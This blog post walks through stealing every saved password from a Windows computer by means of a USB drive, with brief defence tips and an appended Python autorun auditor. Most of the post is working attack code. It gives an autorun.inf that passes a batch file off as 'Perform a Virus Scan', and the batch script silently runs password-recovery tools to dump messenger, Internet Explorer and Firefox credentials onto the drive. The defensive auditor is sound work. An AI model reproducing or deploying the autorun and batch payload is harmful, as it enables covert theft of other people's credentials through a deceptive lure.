How to Obtain all Passwords in a Computer & How to Protect yourself from such an Attack.

 

   I’ll describe a procedure that copies all passwords stored on a computer onto a pen drive/flash drive, and later I’ll teach you how to protect yourself from such an attack.

   I’ll work in a folder called “Kougon Super Drive”, but you can use any folder of your choice. You could also save all the files directly onto a pen drive.

1. Open a Notepad file and type the following piece of code

[autorun]
open= scan.bat
ACTION= Perform a Virus Scan

Save the file as “autorun.inf”


2. Now we will need a few programs to rip passwords off Windows. A company called NirSoft has been making free software that can do this using a clever piece of code. By using the link you can access all their recovery software. I’ll use only a few of them:

  • Messenger Pass (mspass) : This will recover all passwords from all Messengers.
  • IE pass view (iepv) : Recover passwords saved on Internet Explorer
  • Password Fox (passwordFox): Recovers all Firefox passwords.

Extract all the executable files after you download the above software and place them in a folder called “passes”. This folder must be inside the current working folder.

Now all these utilities can be called using command-line parameters. We’ll now write a batch file to call them silently and save the resulting passwords to a series of HTML files.

3. Open Notepad and type the following piece of code 

@echo off
set number=1

:looper
if exist "passes/mspass%number%.html" set /a number=%number%+1
if not exist "passes/mspass%number%.html" goto savepasses
goto looper

:savepasses

start passes/mspass.exe /shtml passes/mspass%number%.html

start passes/iepv.exe /shtml passes/iepv%number%.html

start passes/passwordfox.exe /shtml passes/passwordfox%number%.html

Save this file as “scan.bat”. Save it in the same location as autorun.inf and one level above the passes folder.

4. Copy all these files into a Pen Drive


5. Every time this disk is inserted into a computer you will get an option to “scan the computer”. Run the scan and lo! All the passwords will be dumped in neat HTML files in the passes folder. The filenames are automatically incremented after each iteration, so you don’t have to bother changing the file names.

DEFENCE from this Exploit

You can save yourself from this attack by using 2 free programs. I recommend Avira’s AntiVir and C.O.M.O.D.O Personal Firewall. You may have to make small changes in the configuration of AntiVir.

AntiVir is a free anti-virus program produced by Avira. It has one of the best detection rates and virus-removal efficiency. {Verify it online through Wikipedia}.

Open Avira and click on “Configuration”.


Check the “Expert Mode” radio button. Now click on “General”, click on “Select all” for threat categories and hit Apply. Just make sure you end up with the following window.


 

That’s it: the anti-virus software will now detect all the password-sniffing software and will give you an option to prevent it from being executed.

 

In C.O.M.O.D.O Firewall, just enable the Defense+ option and keep it in the default “Safe PC mode”. This will protect your computer from any programs that wish to access memory locations that are used to store passwords.


This will protect your computer from prying eyes.
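
A complementary check on the drive itself, as an added example that is not part of the original post: a small Python auditor that reads an autorun.inf and reports any entry that launches a program, together with the prompt text the drive chose for itself. The function names (parse_autorun, audit_autorun) are hypothetical, and the sample input is constructed from the autorun.inf shown earlier on this page.

```python
import re

# Keys in the [autorun] section that make Windows run a program.
EXEC_KEYS = {"open", "shellexecute"}
# Context-menu verbs of the form shell\<verb>\command also run a program.
SHELL_CMD = re.compile(r"^shell\\[^\\]+\\command$", re.I)
SCRIPT_EXT = (".bat", ".cmd", ".exe", ".vbs", ".js", ".ps1", ".scr", ".com")

def parse_autorun(text):
    """Return {key: value} for the [autorun] section (keys lower-cased)."""
    entries, in_section = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue  # skip blank lines and comments
        if line.startswith("[") and line.endswith("]"):
            in_section = line[1:-1].strip().lower() == "autorun"
            continue
        if in_section and "=" in line:
            key, value = line.split("=", 1)
            entries[key.strip().lower()] = value.strip()
    return entries

def audit_autorun(text):
    """Return a list of findings explaining why the file deserves review."""
    entries = parse_autorun(text)
    findings = []
    for key, value in entries.items():
        if key in EXEC_KEYS or SHELL_CMD.match(key):
            target = value.split()[0].lower() if value else ""
            kind = "script/executable" if target.endswith(SCRIPT_EXT) else "command"
            findings.append(f"{key} launches {kind}: {value}")
    # The action text is supplied by the drive, so a launch entry paired with
    # a reassuring label ("Perform a Virus Scan") is worth showing to the user.
    if "action" in entries and findings:
        findings.append(f"AutoPlay prompt text chosen by the drive: {entries['action']!r}")
    return findings

# Constructed sample: the autorun.inf from step 1 of this page.
SAMPLE = "[autorun]\nopen= scan.bat\nACTION= Perform a Virus Scan\n"

if __name__ == "__main__":
    for finding in audit_autorun(SAMPLE):
        print("REVIEW:", finding)
```

Run it against the autorun.inf of any removable drive before trusting an AutoPlay prompt; an empty result means the file only sets cosmetic entries such as an icon or label.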

1 comment:

Anonymous said...

Yes, it works. And thanks to Gada, I am protected now. Completely ;)
